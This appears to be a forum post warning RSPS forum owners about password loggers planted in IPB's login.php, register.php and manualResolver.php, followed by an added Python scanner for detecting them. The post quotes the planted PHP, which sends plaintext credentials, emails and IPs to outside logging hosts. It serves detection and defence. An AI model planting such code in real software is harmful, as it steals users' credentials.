Hello,
As with previous announcements regarding lower-tier RSPS being breached and passwords cracked, I have noticed a very disturbing piece of script planted in core PHP files of IPB to log user credentials in plaintext, which is sent to a database server used to steal your data! DO NOT WORRY, IKOV WAS NOT AFFECTED, BUT MANY OTHER RSPS ARE!!!!!
If you own an RSPS and you have concerns about being hacked, or have previously been hacked, here is how to check for password loggers.
\admin\applications\core\modules_public\global\login.php
\admin\applications\core\modules_public\global\register.php
\admin\applications\core\modules_admin\login\manualResolver.php
In login.php, on lines 114 - 128, there is an else statement that looks like this:
Code:
else
{
    if ($_SERVER['HTTP_CF_CONNECTING_IP'] == null)
    {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    else if ($_SERVER['HTTP_CF_CONNECTING_IP'] != null)
    {
        $ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
    }
    $user = str_replace(' ', '%20', $this->request['ips_username']);
    $pass = str_replace(' ', '%20', $this->request['ips_password']);
    @file_get_contents('http://*.pw/tools/inserty.php?site=' . $_SERVER['SERVER_NAME'] . '&type=Forum_Login&username=' . $user . '&password=' . $pass . '&email=N/A&ip=' . $ip);
    $this->registry->getClass('output')->redirectScreen( $return[0], $return[1] );
}
In register.php, on lines 1768 - 1808:
Code:
if ($_SERVER['HTTP_CF_CONNECTING_IP'] == null)
{
    $ip = $_SERVER['REMOTE_ADDR'];
}
else if ($_SERVER['HTTP_CF_CONNECTING_IP'] != null)
{
    $ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
}
$user = str_replace(' ', '%20', $this->request['members_display_name']);
@file_get_contents('http://*.pw/tools/inserty.php?site=' . $_SERVER['SERVER_NAME'] . '&type=Registration&username=' . $user . '&password=' . $in_password . '&email=' . $in_email . '&ip=' . $ip);
In manualResolver.php, on lines 228 - 253:
Code:
/* Log them in public side if not already */
$publicApi->logGuestInAsMember( $mem['member_id'] );
$user = str_replace(' ', '%20', $this->request['username']);
@file_get_contents('http://*.nl/logger/inserty.php?site=' . $_SERVER['SERVER_NAME'] . '&type=ACP_Login&username=' . $user . '&password=' . $this->request['password'] . '&email=' . $mem['email'] . '&ip=' . $_SERVER['REMOTE_ADDR']);
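One way to automate the check described in this post, as an added example (not code from the original post or from IPB): a Python scanner that flags PHP lines making a remote fetch that includes a password field or a variable derived from one. The function names and the `.example` hosts in the constructed sample are assumptions.

```python
import os
import re

# PHP functions that can make an outbound request.
FETCH = re.compile(r"\b(file_get_contents|fopen|curl_init|fsockopen)\s*\(")
URL = re.compile(r"""['"]https?://""", re.I)
# Credential-bearing names seen in the snippets above (ips_password, $in_password, $pass).
CRED = re.compile(r"passw(?:or)?d|\$pass\b", re.I)
ASSIGN = re.compile(r"^\s*(\$\w+)\s*=\s*(.+);")

def uses(expr, variables):
    """True if expr references any of the given PHP variable names."""
    return any(re.search(re.escape(v) + r"\b", expr) for v in variables)

def scan_php_source(source):
    """Return [(line_no, line)] for remote fetches that carry credential data."""
    tainted, hits = set(), []  # tainted: variables derived from a credential field
    for no, line in enumerate(source.splitlines(), 1):
        m = ASSIGN.match(line)
        if m and (CRED.search(m.group(2)) or uses(m.group(2), tainted)):
            tainted.add(m.group(1))
        if FETCH.search(line) and URL.search(line):
            if CRED.search(line) or uses(line, tainted):
                hits.append((no, line.strip()))
    return hits

def scan_tree(root):
    """Scan every .php file under root; return {path: hits} for files with hits."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_php_source(fh.read())
                if hits:
                    report[path] = hits
    return report

# Constructed sample: a renamed-variable variant plus a harmless version check.
SAMPLE = r"""
$v = file_get_contents('http://updates.example/version.txt');
$p = $this->request['ips_password'];
$q = urlencode($p);
@file_get_contents('http://logger.example/inserty.php?u=' . $user . '&x=' . $q);
"""

if __name__ == "__main__":
    for no, line in scan_php_source(SAMPLE):
        print(f"line {no}: {line}")
```

A hit is a lead to review by hand, not proof of compromise; comparing the three files against a clean copy of the same IPB version remains the definitive check.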